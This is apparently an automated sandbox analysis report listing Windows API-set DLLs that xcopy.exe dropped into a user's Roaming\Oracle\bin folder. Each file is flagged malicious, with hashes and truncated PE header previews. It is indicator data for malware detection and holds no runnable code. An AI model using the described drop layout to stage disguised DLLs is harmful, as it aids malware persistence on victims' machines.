                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.8774870825959455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dY3ZDQtZ34WthWhIaWf9BvVVWQ4eWqgqtkqnajOyr39fk:dY3ZDQtZ34WthWhiNClqyry
                                                                                                                                                                                                                                  MD5:C250B2E4FF04D22306BF8CE286AFD158
                                                                                                                                                                                                                                  SHA1:E5C60B7892FF64CBFF02D551F9DBF25218C8195B
                                                                                                                                                                                                                                  SHA-256:42367B6B7285BDDC185C0BADEFE49E883646F574B1D7D832C226F2D1CE489C5B
                                                                                                                                                                                                                                  SHA-512:A78C4DDF98330698C9DA8D1D2C7C3176F22DFABF0900008CFF1F294F56A2A14B52BECD09BA37A065D544F58617911B3F5850614B5AABD0EC7DAF236F29C9B10B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....v............!......................... ...............................0............@......................... ...v............ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@......v.........9...T...T.........v.........d.................v.........$...........RSDSVji.....k....l.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg... ...v....edata... ..`....rsrc$01....` .......rsrc$02.... ...Vji.....k....l......(x..&c..v...............v.....................H...........0...r...............?...w...............F...................D...w.......V...............,...[...............-...h...............0...a...........................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.7734901397416305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:u7QzKIMF8WthWSWf9BvVVWQ4SWWvWjsmsqnajrQgdu:u8zRWthWvN9As9lPQ0u
                                                                                                                                                                                                                                  MD5:5358E9B3DAD8730ED4B2DA280161175F
                                                                                                                                                                                                                                  SHA1:91066FF0FB55FD30E3C554655D6EEC47A13A1773
                                                                                                                                                                                                                                  SHA-256:77B5019D54AA05AD70D0C1BEC4A7EA5F3BA499B493C03EA198B27CEB8509D1AF
                                                                                                                                                                                                                                  SHA-512:061B63B1965D3203116AAA7E026420D5BB3A0874237671E14A31ABCA889DD728575F625EEE3117FF26DCFEC9D842306CDDFA134C2FAE9947BFD46D7D9EB50F1E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L..................!......................... ...............................0.......!....@......................... ...E............ ...................!..............T............................................................................text...e........................... ..`.rsrc........ ......................@..@................;...T...T...................d...........................$...........RSDS.s.ry...."....:.....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg... ...E....edata... ..`....rsrc$01....` .......rsrc$02.... ....s.ry...."....:....q..............................$...............H...........Z...............0...n...................W...............*...K...m...............$...O...G...v...............Z...................?...x...............@..._.......

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11736
                                                                                                                                                                                                                                  Entropy (8bit):6.871940955476924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:M3WthWjWf9BvVVWQ4SWiXfvXqnajJ6HdKpx:M3WthWuNNXll6Hdmx
                                                                                                                                                                                                                                  MD5:3339350008A663975BA4953018C38673
                                                                                                                                                                                                                                  SHA1:78614A1AAD7FC83D6999DCC0F467B43693BE3D47
                                                                                                                                                                                                                                  SHA-256:4F77ABB5C5014769F907A194FD2E43B3C977DF1FB87F8C98DD15A7B950D1E092
                                                                                                                                                                                                                                  SHA-512:A303FD57DD59F478A8D6C66785768886509625A2BAF8BF2B357BB249FC93F193AC8C5C2C9193E53738805700E49B941BF741D6C4850A43F29A82424CCDDA191B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...2..............!......................... ...............................0......ty....@......................... ...M............ ...................!..............T............................................................................text...m........................... ..`.rsrc........ ......................@..@....2...........<...T...T.......2...........d...............2...........$...........RSDS.i.\..{3..JX........api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg... ...M....edata... ..`....rsrc$01....` .......rsrc$02.... ....i.\..{3..JX....G..|..{j..82...............2.......................H...|...........N...........-...k...........#...a...........B.......9...l...........M...............A........... .............................api-ms-win-core-timezone-l1-1-

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11224
                                                                                                                                                                                                                                  Entropy (8bit):6.802243596545944
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:zqWthWVWf9BvVVWQ4SWSIxfvXqnajJ6HOv:zqWthWwNvSXll6HA
                                                                                                                                                                                                                                  MD5:75CE488183D0627B89BAA0B174CF2C2F
                                                                                                                                                                                                                                  SHA1:E66C1BAC9625AFE091A0EF4B46615BB07103D442
                                                                                                                                                                                                                                  SHA-256:8C2D5915B436C2848CEFAC33AE47E5BA1E96EBA0310B9836F069BB5C767A7D42
                                                                                                                                                                                                                                  SHA-512:6A6DB2DFF988E8175C5FDA3DC7FC8925C2CBFEE90088DE50715FCA3010C3C47E0E554329126B1B345B19C5EBE5CD867A81FB904C7E47AA1B41963D856A1CF7DE
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....}y...........!......................... ...............................0......:.....@......................... ...9............ ...................!..............T............................................................................text...Y........................... ..`.rsrc........ ......................@..@......}y........8...T...T.........}y........d.................}y........$...........RSDS8T.6V.Q.6.:fA&.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg... ...9....edata... ..`....rsrc$01....` .......rsrc$02.... ...8T.6V.Q.6.:fA&.{....*.d..u..}y..................}y....z...............H...\...p...................<...................(.............api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.ke

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.79800869596736
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wEWthWyWf9BvVVWQ4SWbTKMdn2KqnajySHrG:wEWthWPNanll1HrG
                                                                                                                                                                                                                                  MD5:EB07D1E84FD3FD83E71C1EA7AE8498A3
                                                                                                                                                                                                                                  SHA1:B162375E93C40955244342D18902BFF8ED902674
                                                                                                                                                                                                                                  SHA-256:687BE4F560DC3FB96BCDA9332617A2D4B1D587411DD1C31AD088146AC0B24A76
                                                                                                                                                                                                                                  SHA-512:5787637599E1EC9F086C78BFA4CE7D49A8374404DBCE8D884E90282B366A446EF3444288ADD0F3741C642BEB01266555053091BDEE2EE70BF6126052BF1564E0
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L..................!......................... ...............................0............@.........................0................ ...................!..............T............................................................................text... ........................... ..`.rsrc........ ......................@..@v...............................8...d...d...................d...........................$...........RSDS=../..S.?...........api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg...0........edata... ..`....rsrc$01....` .......rsrc$02.... ...=../..S.?..........|XG..~.o............................................X.......H...........4...n...........#..._...............................=...\...|.......................=...\...|...............................W...........

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15328
                                                                                                                                                                                                                                  Entropy (8bit):6.567637461631769
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:3M0wd8dc9cyNWthW3Wf9BvVVWQ4SWLbnstWqqnajWz:80wd8xyNWthWKNUe7lKz
                                                                                                                                                                                                                                  MD5:392B572DC6275D079270AD8E751A2433
                                                                                                                                                                                                                                  SHA1:8347BBA17ED3E7D5C2491F2177AF3F35881E4420
                                                                                                                                                                                                                                  SHA-256:347CEEB26C97124FB49ADD1E773E24883E84BF9E23204291066855CD0BAEA173
                                                                                                                                                                                                                                  SHA-512:DBDBD159B428D177C5F5B57620DA18A509350707881FB5040AC10FAF2228C2CCFD6126EA062C5DD4D13998624A4F5745ED947118E8A1220190FDB93B6A3C20B7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....}J............!.........................0...............................@.......p....@.........................0................0...................!..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................}J.........:...d...d........}J.........d................}J.........$...........RSDS......p..........api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg...0........edata...0..`....rsrc$01....`0.......rsrc$02.... .........p......*..4...?..}J..............}J.............z...z...X...@...(...H...c...~...........................7...Q...n.............................../...J...e...............................#...:...U...r...............

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.770473650765546
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:f9KNMWthWbWf9BvVVWQ4SWAV/tkqnajOyr39J:1KNMWthWGNQlqyrn
                                                                                                                                                                                                                                  MD5:9806F2F88BA292B8542A964C0B102876
                                                                                                                                                                                                                                  SHA1:C02E1541A264A04963ADD31D2043FA954B069B6B
                                                                                                                                                                                                                                  SHA-256:CF601A7B883BB4FB87C28B4A1D9F823D2454B298CDBCB4DA4F508DB8BD1278BA
                                                                                                                                                                                                                                  SHA-512:D68CB926DE3CAA498AD2AEA60E2C5DBB72F30836A6AD9BB11A48F2CA706656981D9332DAE44769CCF6F8DE3B2EA1507983440AFBE1322520F2FD1674CD8DE823
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....S............!......................... ...............................0.......?....@.........................0..."............ ...................!..............T............................................................................text...R........................... ..`.rsrc........ ......................@..@v....................S.........>...d...d........S.........d................S.........$...........RSDS..V,..y.v.`.En.5....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg...0..."....edata... ..`....rsrc$01....` .......rsrc$02.... .....V,..y.v.`.En.5....f5.uS..S..........S.....................X...........?...c...........................7...S...o.......................'...@...2...U...z...........................I...f....................... ...7...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13280
                                                                                                                                                                                                                                  Entropy (8bit):6.8016146360593925
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:YGnWlC0i5ClWthWIpWf9BvVVWQ4SWPlQ4Ms5jpC52qnajABI1yVqC:XnWm5ClWthW/NKKls5Nlse1TC
                                                                                                                                                                                                                                  MD5:1747189E90F6D3677C27DC77382699D8
                                                                                                                                                                                                                                  SHA1:17E07200FC40914E9AA5CBFC9987117B4DC8DB02
                                                                                                                                                                                                                                  SHA-256:6CC23B34F63BA8861742C207F0020F7B89530D6CDD8469C567246A5879D62B82
                                                                                                                                                                                                                                  SHA-512:D2CC7223819B9109B7CE2475DFB2A58DA78D0D3D606B05B6F24895D2F05FB1B83EE4C1D7A863F3C3488F5D1B014CD5B429070577BD53D00BB1E0A0A9B958F0B1
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...a..............!......................... ...............................0......^.....@.........................0................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................a...........=...d...d.......a...........d...............a...........$...........RSDS...}...@A..........api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg...0........edata... ..`....rsrc$01....` .......rsrc$02.... ......}...@A.......M?........a...........a...............A...A...X...\...`.......*...D...]...v...................$...I...m.......................0...O...o.......................%...<...W...x...........................8...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.739864339949008
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:uaY17aFBRQWthWAWf9BvVVWQ4SWk7djwqS8uUgxfzfqnaj0O4WzQ:0tWthWFNl5nFIrloqU
                                                                                                                                                                                                                                  MD5:1BCB55590AB80C2C78F8CE71EADEB3DC
                                                                                                                                                                                                                                  SHA1:8625E6ED37C1A5678C3B4713801599F792DC1367
                                                                                                                                                                                                                                  SHA-256:A3F13FA93131A17E05AD0C4253C34B4DB30D15EAE2B43C9D7EC56FDC6709D371
                                                                                                                                                                                                                                  SHA-512:D80374EC9B17692B157031F771C6C86DC52247C3298594A936067473528BBB511BE4E033203144BBF2EC2ACFD7E3E935F898C945EB864DCF8B43AE48E3754439
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....C#............!......................... ...............................0......3.....@.........................0................ ...................!..............T............................................................................text...F........................... ..`.rsrc........ ......................@..@v....................C#.........7...d...d........C#.........d................C#.........$...........RSDS........znm.m.Z....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg...0........edata... ..`....rsrc$01....` .......rsrc$02.... ...........znm.m.Z[k3........C#..................C#.....f...............X.......0...................I...................'...E...a...........................@...l...........................5...................1...j...............

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.869420709868426
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:B9vbJWthWZWf9BvVVWQ4SWRHQ0tkqnajOyr39jGJ:B9vbJWthWMNS4lqyrM
                                                                                                                                                                                                                                  MD5:7481E20041CF8E366D737962D23EC9DE
                                                                                                                                                                                                                                  SHA1:A13C9A2D6CF6C92050EAAE5ECB090A401359D992
                                                                                                                                                                                                                                  SHA-256:4615EC9EFFC0C27FC0CFD23AD9D87534CBE745998B7D318AE84ECE5EA1338551
                                                                                                                                                                                                                                  SHA-512:F7A8E381D1AC2704D61258728A9175834CF414F7F2FF79BD8853E8359D6468839585CB643F0871334B943B0F7B0D868E077F6BD3F61668E54785EE8B94BF7903
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L..................!......................... ...............................0............@.........................0...e............ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...............................9...d...d...................d...........................$...........RSDSZL..3.,..8....=.....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg...0...e....edata... ..`....rsrc$01....` .......rsrc$02.... ...ZL..3.,..8....=.....g/............................. ...............X...........U..............."...e...................D...n.......................D...d.......A...r...............@...................7...Z...................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21984
                                                                                                                                                                                                                                  Entropy (8bit):6.275215209761443
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:eqTycTGMMmfcObM4Oe5/cDHosrbmkvALwPIgTmL45WthWlWf9BvVVWQ4SWO2odVE:xt1MCbM4Oe5grykfIgTmLCWthWgNwlKU
                                                                                                                                                                                                                                  MD5:F4E9937296EC528938A3C28A48687F5C
                                                                                                                                                                                                                                  SHA1:961390A2C5E08336857C8A39B254B2BFE3D8BDC6
                                                                                                                                                                                                                                  SHA-256:190A2CC8C8E47FCD4D07B4E260E247FB3B5FB4661AA50F7B05158CD062D80762
                                                                                                                                                                                                                                  SHA-512:00CCF9326E593236F57C39FFCD3AB1A77C54755C5F938207AD548D64D60A7468EA21F6E340D385E6576BB049BCA1DD318DA572C5808C353DDA1C4629FD99BC42
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L..../.............!.........................@...............................P......;.....@.........................0....+...........@...............4...!..............T............................................................................text....-.......................... ..`.rsrc........@.......0..............@..@v..................../..........7...d...d......../..........d................/..........$...........RSDS......../.#j...g....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg...0....+...edata...@..`....rsrc$01....`@.......rsrc$02.... .........../.#j...g"F.. .."N..../.................../..............:...:...X...@...(...................(...@...X...p...............................2...K...d...}.................... ... ..A ..m ... ... ... ...!..J!..u!...!...!...!..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19424
                                                                                                                                                                                                                                  Entropy (8bit):6.29176027690929
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0SrxLPmIHJI6/CpG3t2G3t4odXLRWthW5NsH9slEE87oV:0iPmIHJI6msut7g
                                                                                                                                                                                                                                  MD5:34CBF951DFE519D8CC0034D13026BB26
                                                                                                                                                                                                                                  SHA1:156E860545717772C0B290AC9BF6883D9769419F
                                                                                                                                                                                                                                  SHA-256:B05A5303C9C1059216787E878884B96474480AE5505DC60BE97095F8CDF876D5
                                                                                                                                                                                                                                  SHA-512:5E812C17866EDF300C21F8D5EE121EE8B4225288FF10A937870356EE2DC780A54FB3244AB6A01CE8FF2FD2D2FA023377335D8DA13F09B8C8E6FC30C6EE53CECC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...C..............!.....$...................@...............................P......S.....@.........................0.... ...........@...............*...!..............T............................................................................text...$".......$.................. ..`.rsrc........@.......&..............@..@v...................C...........<...d...d.......C...........d...............C...........$...........RSDS5...`.5n.....E.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg...0.... ...edata...@..`....rsrc$01....`@.......rsrc$02.... ...5...`.5n.....E..fWH.8..9..yC...............C.......(...............X...x.......[...........................Q...t...................$...G...l.......................?...b.......................4...W...z...................)...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66016
                                                                                                                                                                                                                                  Entropy (8bit):5.544944564166023
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:vfolDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPHOtq:XolDe5c4bFE2Jy2cvxXWpD9d3334BkZy
                                                                                                                                                                                                                                  MD5:C79DDCFA529DC335ED3E5D538243BF92
                                                                                                                                                                                                                                  SHA1:1C960C665242142ACA25DF06A0BC29C73126BC73
                                                                                                                                                                                                                                  SHA-256:E5799A718CFA39B0B6CCDC88F3732CD5DD13C5E4A64DE6CFF4ED4EBA20DE3371
                                                                                                                                                                                                                                  SHA-512:07A36836DAAC82A993C198402633CCAB80AC1046BC3F85EBAC7BEF6219B6C8A8C3AAC88E96D1143E33E113A7A73F8B6DFE0D7C91920AB9F23B532D64FA5D3589
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....6v............!................................................................./....@.........................0....................................!..............T............................................................................text............................... ..`.rsrc...............................@..@v....................6v.........:...d...d........6v.........d................6v.........$...........RSDS.{..O..<Bc..s......api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg...0........edata......`....rsrc$01....`........rsrc$02.... ....{..O..<Bc..s..mu......L...6v..............6v......>..............X....#...5...?..0?..W?...?...?...?...@..:@..v@...@...@...A..KA..|A...A...A...B..8B..lB...B...B..1C..hC...C...C...C...D..?D..hD...D...D..9E...E...E...E.. F..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.768289494091275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:MConqjd7NWthWuWf9BvVVWQ4SW0wmqqnajWW/Q:MConsWthWzN+lK+Q
                                                                                                                                                                                                                                  MD5:C498A15DE6A91156009C6E5BC0DE1FF2
                                                                                                                                                                                                                                  SHA1:1B015D9F793518BE3C579FDC4334BF81E6F4E874
                                                                                                                                                                                                                                  SHA-256:194F04516084785A9650EAC58777AE7ACEBD90D5FABC3E21CEBDF705CC0D34B6
                                                                                                                                                                                                                                  SHA-512:898107D0D34A6668C7D00E2C4818023F7ADA7229EB06E7BCF7BF745575F30F8DD58503FBD266F9F5498DAD915E7344000684A0CF533781130C471A30307EDB67
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...K.b............!......................... ...............................0............@.........................0...x............ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................K.b.........:...d...d.......K.b.........d...............K.b.........$...........RSDS...'..2.}..(a......api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg...0...x....edata... ..`....rsrc$01....` .......rsrc$02.... ......'..2.}..(a.....R..U..AK.b.............K.b.............$...$...X.......x...............-...F...`...y...............................J...e...........................%...A...\...v....................... ...=...Y...v.......

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15840
                                                                                                                                                                                                                                  Entropy (8bit):6.597851406056642
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:1JB0fhrpIhhf4AN5/jiDWthWhxWf9BvVVWQ4eWVvjwBjpC52qnajABI1wkM:10hrKIWthWhkNIjwBNlse13M
                                                                                                                                                                                                                                  MD5:047C779F39EBB4F57020CD5B6FB2D083
                                                                                                                                                                                                                                  SHA1:440077FC83D1C756FE24F9FB5EAE67C5E4ABD709
                                                                                                                                                                                                                                  SHA-256:078D2551F53CA55715F5C6A045DE1260CE331B97FD6D047F8455E06D97EF88DC
                                                                                                                                                                                                                                  SHA-512:95A57D79C47D11F43796AEA8FD1183D3DB9448DEE60530144B64A2DD3CD863F5B413356076C26101D96DD007EBF8AFF9E23CF721BA4E03D932C333B8E5536B73
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...\.............!.........................0...............................@.......i....@.........................0................0...................!..............T............................................................................text............................... ..`.rsrc........0......................@..@v...................\..........:...d...d.......\..........d...............\..........$...........RSDS$U#.......HLn....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg...0........edata...0..`....rsrc$01....`0.......rsrc$02.... ...$U#.......HLn..4.}.....l.\..............\..............k...k...X...........................6...T...s.......................>...e.......................+...I...n.......................F...e...................&...G...d...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17376
                                                                                                                                                                                                                                  Entropy (8bit):6.502279400133776
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wpPLNPjFuWYFxEpahDWthWAcWf9BvVVWQ4SWQZ/bSoMdn2KqnajySHUZt:w19OFVhDWthWSNpQnll1HUZt
                                                                                                                                                                                                                                  MD5:10E9DFC88BF784847E7B9AAB82E28D0C
                                                                                                                                                                                                                                  SHA1:CB750CF87D561CA32F5860854DA374DAE6C9F2AD
                                                                                                                                                                                                                                  SHA-256:E6BAB87156C9E7AE14CE36A754EB6891891A22DDFFF584B706538152017FBB0F
                                                                                                                                                                                                                                  SHA-512:29C2EDB44CADA75EE8CCAE1B55A405C8282C937450913196D54B6DA1A1E121451C6E14A92A200574984961FA8C649D8A40CAF58EA50A33D42A7DFAE4439091C2
                                                                                                                                                                                                                                  Malicious:true
